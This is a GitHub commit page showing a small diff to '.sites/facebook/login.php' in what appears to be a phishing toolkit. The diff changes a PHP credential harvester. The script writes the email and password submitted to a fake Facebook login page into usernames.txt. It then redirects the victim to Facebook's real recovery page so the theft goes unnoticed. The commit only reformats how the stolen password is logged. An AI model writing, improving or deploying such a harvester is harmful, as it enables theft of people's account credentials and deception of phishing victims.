Skip to content

Commit e159dae

Browse files
authored
Minor Issue on "Facebook/login.php"
Graphical shell error for facebook login #457
2 parents e9b4c48 + 397f8a8 commit e159dae

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

.sites/facebook/login.php

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
<?php
2-
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "\nPassword: " . $_POST['pass'] ."\n", FILE_APPEND);
2+
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
33
header('Location: https://facebook.com/recover/initiate/');
44
exit();
5-
?>
5+
?>

0 commit comments

Comments
 (0)